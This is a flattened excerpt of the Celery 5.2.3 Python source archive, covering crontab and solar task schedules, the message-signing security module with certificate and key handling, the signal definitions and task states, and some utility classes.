cronfield(hour) self._orig_day_of_week = cronfield(day_of_week) self._orig_day_of_month = cronfield(day_of_month) self._orig_month_of_year = cronfield(month_of_year) self._orig_kwargs = kwargs self.hour = self._expand_cronspec(hour, 24) self.minute = self._expand_cronspec(minute, 60) self.day_of_week = self._expand_cronspec(day_of_week, 7) self.day_of_month = self._expand_cronspec(day_of_month, 31, 1) self.month_of_year = self._expand_cronspec(month_of_year, 12, 1) super().__init__(**kwargs) @staticmethod def _expand_cronspec(cronspec, max_, min_=0): """Expand cron specification. Takes the given cronspec argument in one of the forms: .. code-block:: text int (like 7) str (like '3-5,*/15', '*', or 'monday') set (like {0,15,30,45} list (like [8-17]) And convert it to an (expanded) set representing all time unit values on which the Crontab triggers. Only in case of the base type being :class:`str`, parsing occurs. (It's fast and happens only once for each Crontab instance, so there's no significant performance overhead involved.) For the other base types, merely Python type conversions happen. The argument ``max_`` is needed to determine the expansion of ``*`` and ranges. The argument ``min_`` is needed to determine the expansion of ``*`` and ranges for 1-based cronspecs, such as day of month or month of year. The default is sufficient for minute, hour, and day of week. 
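Example:
    Illustrative only (the values follow from the
    :class:`crontab_parser` rules documented above):

    >>> sorted(crontab._expand_cronspec('*/15', 60))
    [0, 15, 30, 45]
    >>> crontab._expand_cronspec(7, 24)
    {7}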
""" if isinstance(cronspec, numbers.Integral): result = {cronspec} elif isinstance(cronspec, str): result = crontab_parser(max_, min_).parse(cronspec) elif isinstance(cronspec, set): result = cronspec elif isinstance(cronspec, Iterable): result = set(cronspec) else: raise TypeError(CRON_INVALID_TYPE.format(type=type(cronspec))) # assure the result does not preceed the min or exceed the max for number in result: if number >= max_ + min_ or number < min_: raise ValueError(CRON_PATTERN_INVALID.format( min=min_, max=max_ - 1 + min_, value=number)) return result def _delta_to_next(self, last_run_at, next_hour, next_minute): """Find next delta. Takes a :class:`~datetime.datetime` of last run, next minute and hour, and returns a :class:`~celery.utils.time.ffwd` for the next scheduled day and time. Only called when ``day_of_month`` and/or ``month_of_year`` cronspec is specified to further limit scheduled task execution. """ datedata = AttributeDict(year=last_run_at.year) days_of_month = sorted(self.day_of_month) months_of_year = sorted(self.month_of_year) def day_out_of_range(year, month, day): try: datetime(year=year, month=month, day=day) except ValueError: return True return False def is_before_last_run(year, month, day): return self.maybe_make_aware(datetime(year, month, day)) < last_run_at def roll_over(): for _ in range(2000): flag = (datedata.dom == len(days_of_month) or day_out_of_range(datedata.year, months_of_year[datedata.moy], days_of_month[datedata.dom]) or (is_before_last_run(datedata.year, months_of_year[datedata.moy], days_of_month[datedata.dom]))) if flag: datedata.dom = 0 datedata.moy += 1 if datedata.moy == len(months_of_year): datedata.moy = 0 datedata.year += 1 else: break else: # Tried 2000 times, we're most likely in an infinite loop raise RuntimeError('unable to rollover, ' 'time specification is probably invalid') if last_run_at.month in self.month_of_year: datedata.dom = bisect(days_of_month, last_run_at.day) datedata.moy = bisect_left(months_of_year, last_run_at.month) else: datedata.dom = 0 datedata.moy = bisect(months_of_year, last_run_at.month) if datedata.moy == len(months_of_year): datedata.moy = 0 roll_over() while 1: th = datetime(year=datedata.year, month=months_of_year[datedata.moy], day=days_of_month[datedata.dom]) if th.isoweekday() % 7 in self.day_of_week: break datedata.dom += 1 roll_over() return ffwd(year=datedata.year, month=months_of_year[datedata.moy], day=days_of_month[datedata.dom], hour=next_hour, minute=next_minute, second=0, microsecond=0) def __repr__(self): return CRON_REPR.format(self) def __reduce__(self): return (self.__class__, (self._orig_minute, self._orig_hour, self._orig_day_of_week, self._orig_day_of_month, self._orig_month_of_year), self._orig_kwargs) def __setstate__(self, state): # Calling super's init because the kwargs aren't necessarily passed in # the same form as they are stored by the superclass super().__init__(**state) def remaining_delta(self, last_run_at, tz=None, ffwd=ffwd): # pylint: disable=redefined-outer-name # caching global ffwd tz = tz or self.tz last_run_at = self.maybe_make_aware(last_run_at) now = self.maybe_make_aware(self.now()) dow_num = last_run_at.isoweekday() % 7 # Sunday is day 0, not day 7 execute_this_date = ( last_run_at.month in self.month_of_year and last_run_at.day in self.day_of_month and dow_num in self.day_of_week ) execute_this_hour = ( execute_this_date and last_run_at.day == now.day and last_run_at.month == now.month and last_run_at.year == now.year and last_run_at.hour in self.hour and 
last_run_at.minute < max(self.minute) ) if execute_this_hour: next_minute = min(minute for minute in self.minute if minute > last_run_at.minute) delta = ffwd(minute=next_minute, second=0, microsecond=0) else: next_minute = min(self.minute) execute_today = (execute_this_date and last_run_at.hour < max(self.hour)) if execute_today: next_hour = min(hour for hour in self.hour if hour > last_run_at.hour) delta = ffwd(hour=next_hour, minute=next_minute, second=0, microsecond=0) else: next_hour = min(self.hour) all_dom_moy = (self._orig_day_of_month == '*' and self._orig_month_of_year == '*') if all_dom_moy: next_day = min([day for day in self.day_of_week if day > dow_num] or self.day_of_week) add_week = next_day == dow_num delta = ffwd( weeks=add_week and 1 or 0, weekday=(next_day - 1) % 7, hour=next_hour, minute=next_minute, second=0, microsecond=0, ) else: delta = self._delta_to_next(last_run_at, next_hour, next_minute) return self.to_local(last_run_at), delta, self.to_local(now) def remaining_estimate(self, last_run_at, ffwd=ffwd): """Estimate of next run time. Returns when the periodic task should run next as a :class:`~datetime.timedelta`. """ # pylint: disable=redefined-outer-name # caching global ffwd return remaining(*self.remaining_delta(last_run_at, ffwd=ffwd)) def is_due(self, last_run_at): """Return tuple of ``(is_due, next_time_to_run)``. Note: Next time to run is in seconds. SeeAlso: :meth:`celery.schedules.schedule.is_due` for more information. """ rem_delta = self.remaining_estimate(last_run_at) rem = max(rem_delta.total_seconds(), 0) due = rem == 0 if due: rem_delta = self.remaining_estimate(self.now()) rem = max(rem_delta.total_seconds(), 0) return schedstate(due, rem) def __eq__(self, other): if isinstance(other, crontab): return ( other.month_of_year == self.month_of_year and other.day_of_month == self.day_of_month and other.day_of_week == self.day_of_week and other.hour == self.hour and other.minute == self.minute and super().__eq__(other) ) return NotImplemented def __ne__(self, other): res = self.__eq__(other) if res is NotImplemented: return True return not res def maybe_schedule(s, relative=False, app=None): """Return schedule from number, timedelta, or actual schedule.""" if s is not None: if isinstance(s, numbers.Number): s = timedelta(seconds=s) if isinstance(s, timedelta): return schedule(s, relative, app=app) else: s.app = app return s class solar(BaseSchedule): """Solar event. A solar event can be used as the ``run_every`` value of a periodic task entry to schedule based on certain solar events. Notes: Available event valus are: - ``dawn_astronomical`` - ``dawn_nautical`` - ``dawn_civil`` - ``sunrise`` - ``solar_noon`` - ``sunset`` - ``dusk_civil`` - ``dusk_nautical`` - ``dusk_astronomical`` Arguments: event (str): Solar event that triggers this task. See note for available values. lat (int): The latitude of the observer. lon (int): The longitude of the observer. nowfun (Callable): Function returning the current date and time as a class:`~datetime.datetime`. app (Celery): Celery app instance. 
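Example:
    A minimal beat configuration sketch (illustrative; the
    coordinates and the ``tasks.add`` task name are assumptions):

    >>> app.conf.beat_schedule = {
    ...     'add-at-sunset': {
    ...         'task': 'tasks.add',
    ...         'schedule': solar('sunset', -37.81753, 144.96715),
    ...         'args': (16, 16),
    ...     },
    ... }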
""" _all_events = { 'dawn_astronomical', 'dawn_nautical', 'dawn_civil', 'sunrise', 'solar_noon', 'sunset', 'dusk_civil', 'dusk_nautical', 'dusk_astronomical', } _horizons = { 'dawn_astronomical': '-18', 'dawn_nautical': '-12', 'dawn_civil': '-6', 'sunrise': '-0:34', 'solar_noon': '0', 'sunset': '-0:34', 'dusk_civil': '-6', 'dusk_nautical': '-12', 'dusk_astronomical': '18', } _methods = { 'dawn_astronomical': 'next_rising', 'dawn_nautical': 'next_rising', 'dawn_civil': 'next_rising', 'sunrise': 'next_rising', 'solar_noon': 'next_transit', 'sunset': 'next_setting', 'dusk_civil': 'next_setting', 'dusk_nautical': 'next_setting', 'dusk_astronomical': 'next_setting', } _use_center_l = { 'dawn_astronomical': True, 'dawn_nautical': True, 'dawn_civil': True, 'sunrise': False, 'solar_noon': False, 'sunset': False, 'dusk_civil': True, 'dusk_nautical': True, 'dusk_astronomical': True, } def __init__(self, event, lat, lon, **kwargs): self.ephem = __import__('ephem') self.event = event self.lat = lat self.lon = lon super().__init__(**kwargs) if event not in self._all_events: raise ValueError(SOLAR_INVALID_EVENT.format( event=event, all_events=', '.join(sorted(self._all_events)), )) if lat < -90 or lat > 90: raise ValueError(SOLAR_INVALID_LATITUDE.format(lat=lat)) if lon < -180 or lon > 180: raise ValueError(SOLAR_INVALID_LONGITUDE.format(lon=lon)) cal = self.ephem.Observer() cal.lat = str(lat) cal.lon = str(lon) cal.elev = 0 cal.horizon = self._horizons[event] cal.pressure = 0 self.cal = cal self.method = self._methods[event] self.use_center = self._use_center_l[event] def __reduce__(self): return self.__class__, (self.event, self.lat, self.lon) def __repr__(self): return ''.format( self.event, self.lat, self.lon, ) def remaining_estimate(self, last_run_at): """Return estimate of next time to run. Returns: ~datetime.timedelta: when the periodic task should run next, or if it shouldn't run today (e.g., the sun does not rise today), returns the time when the next check should take place. """ last_run_at = self.maybe_make_aware(last_run_at) last_run_at_utc = localize(last_run_at, timezone.utc) self.cal.date = last_run_at_utc try: if self.use_center: next_utc = getattr(self.cal, self.method)( self.ephem.Sun(), start=last_run_at_utc, use_center=self.use_center ) else: next_utc = getattr(self.cal, self.method)( self.ephem.Sun(), start=last_run_at_utc ) except self.ephem.CircumpolarError: # pragma: no cover # Sun won't rise/set today. Check again tomorrow # (specifically, after the next anti-transit). next_utc = ( self.cal.next_antitransit(self.ephem.Sun()) + timedelta(minutes=1) ) next = self.maybe_make_aware(next_utc.datetime()) now = self.maybe_make_aware(self.now()) delta = next - now return delta def is_due(self, last_run_at): """Return tuple of ``(is_due, next_time_to_run)``. Note: next time to run is in seconds. See Also: :meth:`celery.schedules.schedule.is_due` for more information. 
""" rem_delta = self.remaining_estimate(last_run_at) rem = max(rem_delta.total_seconds(), 0) due = rem == 0 if due: rem_delta = self.remaining_estimate(self.now()) rem = max(rem_delta.total_seconds(), 0) return schedstate(due, rem) def __eq__(self, other): if isinstance(other, solar): return ( other.event == self.event and other.lat == self.lat and other.lon == self.lon ) return NotImplemented def __ne__(self, other): res = self.__eq__(other) if res is NotImplemented: return True return not res ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4677508 celery-5.2.3/celery/security/0000775000175000017500000000000000000000000016027 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/__init__.py0000664000175000017500000000434200000000000020143 0ustar00asifasif00000000000000"""Message Signing Serializer.""" from kombu.serialization import \ disable_insecure_serializers as _disable_insecure_serializers from kombu.serialization import registry from celery.exceptions import ImproperlyConfigured from .serialization import register_auth # : need cryptography first CRYPTOGRAPHY_NOT_INSTALLED = """\ You need to install the cryptography library to use the auth serializer. Please install by: $ pip install cryptography """ SECURITY_SETTING_MISSING = """\ Sorry, but you have to configure the * security_key * security_certificate, and the * security_cert_store configuration settings to use the auth serializer. Please see the configuration reference for more information. """ SETTING_MISSING = """\ You have to configure a special task serializer for signing and verifying tasks: * task_serializer = 'auth' You have to accept only tasks which are serialized with 'auth'. There is no point in signing messages if they are not verified. 
* accept_content = ['auth'] """ __all__ = ('setup_security',) try: import cryptography # noqa except ImportError: raise ImproperlyConfigured(CRYPTOGRAPHY_NOT_INSTALLED) def setup_security(allowed_serializers=None, key=None, cert=None, store=None, digest=None, serializer='json', app=None): """See :meth:`@Celery.setup_security`.""" if app is None: from celery import current_app app = current_app._get_current_object() _disable_insecure_serializers(allowed_serializers) # check conf for sane security settings conf = app.conf if conf.task_serializer != 'auth' or conf.accept_content != ['auth']: raise ImproperlyConfigured(SETTING_MISSING) key = key or conf.security_key cert = cert or conf.security_certificate store = store or conf.security_cert_store digest = digest or conf.security_digest if not (key and cert and store): raise ImproperlyConfigured(SECURITY_SETTING_MISSING) with open(key) as kf: with open(cert) as cf: register_auth(kf.read(), cf.read(), store, digest, serializer) registry._set_default_serializer('auth') def disable_untrusted_serializers(whitelist=None): _disable_insecure_serializers(allowed=whitelist) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/certificate.py0000664000175000017500000000565700000000000020700 0ustar00asifasif00000000000000"""X.509 certificates.""" import datetime import glob import os from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import padding from cryptography.x509 import load_pem_x509_certificate from kombu.utils.encoding import bytes_to_str, ensure_bytes from celery.exceptions import SecurityError from .utils import reraise_errors __all__ = ('Certificate', 'CertStore', 'FSCertStore') class Certificate: """X.509 certificate.""" def __init__(self, cert): with reraise_errors( 'Invalid certificate: {0!r}', errors=(ValueError,) ): self._cert = load_pem_x509_certificate( ensure_bytes(cert), backend=default_backend()) def has_expired(self): """Check if the certificate has expired.""" return datetime.datetime.utcnow() >= self._cert.not_valid_after def get_pubkey(self): """Get public key from certificate.""" return self._cert.public_key() def get_serial_number(self): """Return the serial number in the certificate.""" return self._cert.serial_number def get_issuer(self): """Return issuer (CA) as a string.""" return ' '.join(x.value for x in self._cert.issuer) def get_id(self): """Serial number/issuer pair uniquely identifies a certificate.""" return f'{self.get_issuer()} {self.get_serial_number()}' def verify(self, data, signature, digest): """Verify signature for string containing data.""" with reraise_errors('Bad signature: {0!r}'): padd = padding.PSS( mgf=padding.MGF1(digest), salt_length=padding.PSS.MAX_LENGTH) self.get_pubkey().verify(signature, ensure_bytes(data), padd, digest) class CertStore: """Base class for certificate stores.""" def __init__(self): self._certs = {} def itercerts(self): """Return certificate iterator.""" yield from self._certs.values() def __getitem__(self, id): """Get certificate by id.""" try: return self._certs[bytes_to_str(id)] except KeyError: raise SecurityError(f'Unknown certificate: {id!r}') def add_cert(self, cert): cert_id = bytes_to_str(cert.get_id()) if cert_id in self._certs: raise SecurityError(f'Duplicate certificate: {id!r}') self._certs[cert_id] = cert class FSCertStore(CertStore): """File system certificate store.""" def __init__(self, path): super().__init__() if 
os.path.isdir(path): path = os.path.join(path, '*') for p in glob.glob(path): with open(p) as f: cert = Certificate(f.read()) if cert.has_expired(): raise SecurityError( f'Expired certificate: {cert.get_id()!r}') self.add_cert(cert) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/key.py0000664000175000017500000000202200000000000017165 0ustar00asifasif00000000000000"""Private keys for the security serializer.""" from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import padding from kombu.utils.encoding import ensure_bytes from .utils import reraise_errors __all__ = ('PrivateKey',) class PrivateKey: """Represents a private key.""" def __init__(self, key, password=None): with reraise_errors( 'Invalid private key: {0!r}', errors=(ValueError,) ): self._key = serialization.load_pem_private_key( ensure_bytes(key), password=password, backend=default_backend()) def sign(self, data, digest): """Sign string containing data.""" with reraise_errors('Unable to sign data: {0!r}'): padd = padding.PSS( mgf=padding.MGF1(digest), salt_length=padding.PSS.MAX_LENGTH) return self._key.sign(ensure_bytes(data), padd, digest) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/serialization.py0000664000175000017500000001015600000000000021261 0ustar00asifasif00000000000000"""Secure serializer.""" from kombu.serialization import dumps, loads, registry from kombu.utils.encoding import bytes_to_str, ensure_bytes, str_to_bytes from celery.app.defaults import DEFAULT_SECURITY_DIGEST from celery.utils.serialization import b64decode, b64encode from .certificate import Certificate, FSCertStore from .key import PrivateKey from .utils import get_digest_algorithm, reraise_errors __all__ = ('SecureSerializer', 'register_auth') class SecureSerializer: """Signed serializer.""" def __init__(self, key=None, cert=None, cert_store=None, digest=DEFAULT_SECURITY_DIGEST, serializer='json'): self._key = key self._cert = cert self._cert_store = cert_store self._digest = get_digest_algorithm(digest) self._serializer = serializer def serialize(self, data): """Serialize data structure into string.""" assert self._key is not None assert self._cert is not None with reraise_errors('Unable to serialize: {0!r}', (Exception,)): content_type, content_encoding, body = dumps( bytes_to_str(data), serializer=self._serializer) # What we sign is the serialized body, not the body itself. # this way the receiver doesn't have to decode the contents # to verify the signature (and thus avoiding potential flaws # in the decoding step). 
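# Illustrative sketch of the packed payload produced by ``_pack``
# below (``sep`` is ``b'\x00\x01'``; the joined fields are then
# base64 encoded):
#
#   signer <sep> signature <sep> content_type <sep> content_encoding <sep> body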
body = ensure_bytes(body) return self._pack(body, content_type, content_encoding, signature=self._key.sign(body, self._digest), signer=self._cert.get_id()) def deserialize(self, data): """Deserialize data structure from string.""" assert self._cert_store is not None with reraise_errors('Unable to deserialize: {0!r}', (Exception,)): payload = self._unpack(data) signature, signer, body = (payload['signature'], payload['signer'], payload['body']) self._cert_store[signer].verify(body, signature, self._digest) return loads(bytes_to_str(body), payload['content_type'], payload['content_encoding'], force=True) def _pack(self, body, content_type, content_encoding, signer, signature, sep=str_to_bytes('\x00\x01')): fields = sep.join( ensure_bytes(s) for s in [signer, signature, content_type, content_encoding, body] ) return b64encode(fields) def _unpack(self, payload, sep=str_to_bytes('\x00\x01')): raw_payload = b64decode(ensure_bytes(payload)) first_sep = raw_payload.find(sep) signer = raw_payload[:first_sep] signer_cert = self._cert_store[signer] # shift 3 bits right to get signature length # 2048bit rsa key has a signature length of 256 # 4096bit rsa key has a signature length of 512 sig_len = signer_cert.get_pubkey().key_size >> 3 sep_len = len(sep) signature_start_position = first_sep + sep_len signature_end_position = signature_start_position + sig_len signature = raw_payload[ signature_start_position:signature_end_position ] v = raw_payload[signature_end_position + sep_len:].split(sep) return { 'signer': signer, 'signature': signature, 'content_type': bytes_to_str(v[0]), 'content_encoding': bytes_to_str(v[1]), 'body': bytes_to_str(v[2]), } def register_auth(key=None, cert=None, store=None, digest=DEFAULT_SECURITY_DIGEST, serializer='json'): """Register security serializer.""" s = SecureSerializer(key and PrivateKey(key), cert and Certificate(cert), store and FSCertStore(store), digest, serializer=serializer) registry.register('auth', s.serialize, s.deserialize, content_type='application/data', content_encoding='utf-8') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/security/utils.py0000664000175000017500000000151500000000000017543 0ustar00asifasif00000000000000"""Utilities used by the message signing serializer.""" import sys from contextlib import contextmanager import cryptography.exceptions from cryptography.hazmat.primitives import hashes from celery.exceptions import SecurityError, reraise __all__ = ('get_digest_algorithm', 'reraise_errors',) def get_digest_algorithm(digest='sha256'): """Convert string to hash object of cryptography library.""" assert digest is not None return getattr(hashes, digest.upper())() @contextmanager def reraise_errors(msg='{0!r}', errors=None): """Context reraising crypto errors as :exc:`SecurityError`.""" errors = (cryptography.exceptions,) if errors is None else errors try: yield except errors as exc: reraise(SecurityError, SecurityError(msg.format(exc)), sys.exc_info()[2]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/signals.py0000664000175000017500000001026100000000000016172 0ustar00asifasif00000000000000"""Celery Signals. This module defines the signals (Observer pattern) sent by both workers and clients. Functions can be connected to these signals, and connected functions are called whenever a signal is called. .. seealso:: :ref:`signals` for more information. 
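Example (illustrative; ``my_task_succeeded`` is a hypothetical handler,
not part of this module):

.. code-block:: python

    from celery.signals import task_success

    @task_success.connect
    def my_task_succeeded(sender=None, result=None, **kwargs):
        # ``sender`` is the task that ran, ``result`` its return value.
        print(f'{sender.name} returned {result!r}')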
""" from .utils.dispatch import Signal __all__ = ( 'before_task_publish', 'after_task_publish', 'task_internal_error', 'task_prerun', 'task_postrun', 'task_success', 'task_received', 'task_rejected', 'task_unknown', 'task_retry', 'task_failure', 'task_revoked', 'celeryd_init', 'celeryd_after_setup', 'worker_init', 'worker_process_init', 'worker_process_shutdown', 'worker_ready', 'worker_shutdown', 'worker_shutting_down', 'setup_logging', 'after_setup_logger', 'after_setup_task_logger', 'beat_init', 'beat_embedded_init', 'heartbeat_sent', 'eventlet_pool_started', 'eventlet_pool_preshutdown', 'eventlet_pool_postshutdown', 'eventlet_pool_apply', ) # - Task before_task_publish = Signal( name='before_task_publish', providing_args={ 'body', 'exchange', 'routing_key', 'headers', 'properties', 'declare', 'retry_policy', }, ) after_task_publish = Signal( name='after_task_publish', providing_args={'body', 'exchange', 'routing_key'}, ) task_received = Signal( name='task_received', providing_args={'request'} ) task_prerun = Signal( name='task_prerun', providing_args={'task_id', 'task', 'args', 'kwargs'}, ) task_postrun = Signal( name='task_postrun', providing_args={'task_id', 'task', 'args', 'kwargs', 'retval'}, ) task_success = Signal( name='task_success', providing_args={'result'}, ) task_retry = Signal( name='task_retry', providing_args={'request', 'reason', 'einfo'}, ) task_failure = Signal( name='task_failure', providing_args={ 'task_id', 'exception', 'args', 'kwargs', 'traceback', 'einfo', }, ) task_internal_error = Signal( name='task_internal_error', providing_args={ 'task_id', 'args', 'kwargs', 'request', 'exception', 'traceback', 'einfo' } ) task_revoked = Signal( name='task_revoked', providing_args={ 'request', 'terminated', 'signum', 'expired', }, ) task_rejected = Signal( name='task_rejected', providing_args={'message', 'exc'}, ) task_unknown = Signal( name='task_unknown', providing_args={'message', 'exc', 'name', 'id'}, ) #: Deprecated, use after_task_publish instead. 
task_sent = Signal( name='task_sent', providing_args={ 'task_id', 'task', 'args', 'kwargs', 'eta', 'taskset', }, ) # - Program: `celery worker` celeryd_init = Signal( name='celeryd_init', providing_args={'instance', 'conf', 'options'}, ) celeryd_after_setup = Signal( name='celeryd_after_setup', providing_args={'instance', 'conf'}, ) # - Worker import_modules = Signal(name='import_modules') worker_init = Signal(name='worker_init') worker_process_init = Signal(name='worker_process_init') worker_process_shutdown = Signal(name='worker_process_shutdown') worker_ready = Signal(name='worker_ready') worker_shutdown = Signal(name='worker_shutdown') worker_shutting_down = Signal(name='worker_shutting_down') heartbeat_sent = Signal(name='heartbeat_sent') # - Logging setup_logging = Signal( name='setup_logging', providing_args={ 'loglevel', 'logfile', 'format', 'colorize', }, ) after_setup_logger = Signal( name='after_setup_logger', providing_args={ 'logger', 'loglevel', 'logfile', 'format', 'colorize', }, ) after_setup_task_logger = Signal( name='after_setup_task_logger', providing_args={ 'logger', 'loglevel', 'logfile', 'format', 'colorize', }, ) # - Beat beat_init = Signal(name='beat_init') beat_embedded_init = Signal(name='beat_embedded_init') # - Eventlet eventlet_pool_started = Signal(name='eventlet_pool_started') eventlet_pool_preshutdown = Signal(name='eventlet_pool_preshutdown') eventlet_pool_postshutdown = Signal(name='eventlet_pool_postshutdown') eventlet_pool_apply = Signal( name='eventlet_pool_apply', providing_args={'target', 'args', 'kwargs'}, ) # - Programs user_preload_options = Signal( name='user_preload_options', providing_args={'app', 'options'}, ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/states.py0000664000175000017500000000627400000000000016046 0ustar00asifasif00000000000000"""Built-in task states. .. _states: States ------ See :ref:`task-states`. .. _statesets: Sets ---- .. state:: READY_STATES READY_STATES ~~~~~~~~~~~~ Set of states meaning the task result is ready (has been executed). .. state:: UNREADY_STATES UNREADY_STATES ~~~~~~~~~~~~~~ Set of states meaning the task result is not ready (hasn't been executed). .. state:: EXCEPTION_STATES EXCEPTION_STATES ~~~~~~~~~~~~~~~~ Set of states meaning the task returned an exception. .. state:: PROPAGATE_STATES PROPAGATE_STATES ~~~~~~~~~~~~~~~~ Set of exception states that should propagate exceptions to the user. .. state:: ALL_STATES ALL_STATES ~~~~~~~~~~ Set of all possible states. Misc ---- """ __all__ = ( 'PENDING', 'RECEIVED', 'STARTED', 'SUCCESS', 'FAILURE', 'REVOKED', 'RETRY', 'IGNORED', 'READY_STATES', 'UNREADY_STATES', 'EXCEPTION_STATES', 'PROPAGATE_STATES', 'precedence', 'state', ) #: State precedence. #: None represents the precedence of an unknown state. #: Lower index means higher precedence. PRECEDENCE = [ 'SUCCESS', 'FAILURE', None, 'REVOKED', 'STARTED', 'RECEIVED', 'REJECTED', 'RETRY', 'PENDING', ] #: Hash lookup of PRECEDENCE to index PRECEDENCE_LOOKUP = dict(zip(PRECEDENCE, range(0, len(PRECEDENCE)))) NONE_PRECEDENCE = PRECEDENCE_LOOKUP[None] def precedence(state): """Get the precedence index for state. Lower index means higher precedence. """ try: return PRECEDENCE_LOOKUP[state] except KeyError: return NONE_PRECEDENCE class state(str): """Task state. 
State is a subclass of :class:`str`, implementing comparison methods adhering to state precedence rules:: >>> from celery.states import state, PENDING, SUCCESS >>> state(PENDING) < state(SUCCESS) True Any custom state is considered to be lower than :state:`FAILURE` and :state:`SUCCESS`, but higher than any of the other built-in states:: >>> state('PROGRESS') > state(STARTED) True >>> state('PROGRESS') > state('SUCCESS') False """ def __gt__(self, other): return precedence(self) < precedence(other) def __ge__(self, other): return precedence(self) <= precedence(other) def __lt__(self, other): return precedence(self) > precedence(other) def __le__(self, other): return precedence(self) >= precedence(other) #: Task state is unknown (assumed pending since you know the id). PENDING = 'PENDING' #: Task was received by a worker (only used in events). RECEIVED = 'RECEIVED' #: Task was started by a worker (:setting:`task_track_started`). STARTED = 'STARTED' #: Task succeeded SUCCESS = 'SUCCESS' #: Task failed FAILURE = 'FAILURE' #: Task was revoked. REVOKED = 'REVOKED' #: Task was rejected (only used in events). REJECTED = 'REJECTED' #: Task is waiting for retry. RETRY = 'RETRY' IGNORED = 'IGNORED' READY_STATES = frozenset({SUCCESS, FAILURE, REVOKED}) UNREADY_STATES = frozenset({PENDING, RECEIVED, STARTED, REJECTED, RETRY}) EXCEPTION_STATES = frozenset({RETRY, FAILURE, REVOKED}) PROPAGATE_STATES = frozenset({FAILURE, REVOKED}) ALL_STATES = frozenset({ PENDING, RECEIVED, STARTED, SUCCESS, FAILURE, RETRY, REVOKED, }) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4917512 celery-5.2.3/celery/utils/0000775000175000017500000000000000000000000015320 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/__init__.py0000664000175000017500000000164700000000000017441 0ustar00asifasif00000000000000"""Utility functions. Don't import from here directly anymore, as these are only here for backwards compatibility. 
""" from kombu.utils.objects import cached_property from kombu.utils.uuid import uuid from .functional import chunks, memoize, noop from .imports import gen_task_name, import_from_cwd, instantiate from .imports import qualname as get_full_cls_name from .imports import symbol_by_name as get_cls_by_name # ------------------------------------------------------------------------ # # > XXX Compat from .log import LOG_LEVELS from .nodenames import nodename, nodesplit, worker_direct gen_unique_id = uuid __all__ = ( 'LOG_LEVELS', 'cached_property', 'chunks', 'gen_task_name', 'gen_task_name', 'gen_unique_id', 'get_cls_by_name', 'get_full_cls_name', 'import_from_cwd', 'instantiate', 'memoize', 'nodename', 'nodesplit', 'noop', 'uuid', 'worker_direct' ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/abstract.py0000664000175000017500000000547200000000000017505 0ustar00asifasif00000000000000"""Abstract classes.""" from abc import ABCMeta, abstractmethod from collections.abc import Callable __all__ = ('CallableTask', 'CallableSignature') def _hasattr(C, attr): return any(attr in B.__dict__ for B in C.__mro__) class _AbstractClass(metaclass=ABCMeta): __required_attributes__ = frozenset() @classmethod def _subclasshook_using(cls, parent, C): return ( cls is parent and all(_hasattr(C, attr) for attr in cls.__required_attributes__) ) or NotImplemented @classmethod def register(cls, other): # we override `register` to return other for use as a decorator. type(cls).register(cls, other) return other class CallableTask(_AbstractClass, Callable): # pragma: no cover """Task interface.""" __required_attributes__ = frozenset({ 'delay', 'apply_async', 'apply', }) @abstractmethod def delay(self, *args, **kwargs): pass @abstractmethod def apply_async(self, *args, **kwargs): pass @abstractmethod def apply(self, *args, **kwargs): pass @classmethod def __subclasshook__(cls, C): return cls._subclasshook_using(CallableTask, C) class CallableSignature(CallableTask): # pragma: no cover """Celery Signature interface.""" __required_attributes__ = frozenset({ 'clone', 'freeze', 'set', 'link', 'link_error', '__or__', }) @property @abstractmethod def name(self): pass @property @abstractmethod def type(self): pass @property @abstractmethod def app(self): pass @property @abstractmethod def id(self): pass @property @abstractmethod def task(self): pass @property @abstractmethod def args(self): pass @property @abstractmethod def kwargs(self): pass @property @abstractmethod def options(self): pass @property @abstractmethod def subtask_type(self): pass @property @abstractmethod def chord_size(self): pass @property @abstractmethod def immutable(self): pass @abstractmethod def clone(self, args=None, kwargs=None): pass @abstractmethod def freeze(self, id=None, group_id=None, chord=None, root_id=None, group_index=None): pass @abstractmethod def set(self, immutable=None, **options): pass @abstractmethod def link(self, callback): pass @abstractmethod def link_error(self, errback): pass @abstractmethod def __or__(self, other): pass @abstractmethod def __invert__(self): pass @classmethod def __subclasshook__(cls, C): return cls._subclasshook_using(CallableSignature, C) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/collections.py0000664000175000017500000006204300000000000020215 0ustar00asifasif00000000000000"""Custom maps, sets, sequences, and other data structures.""" 
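# Example (illustrative) of the attribute-access mapping defined below:
#
#   >>> d = AttributeDict(region='eu', retries=3)
#   >>> d.region
#   'eu'
#   >>> d['retries']
#   3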
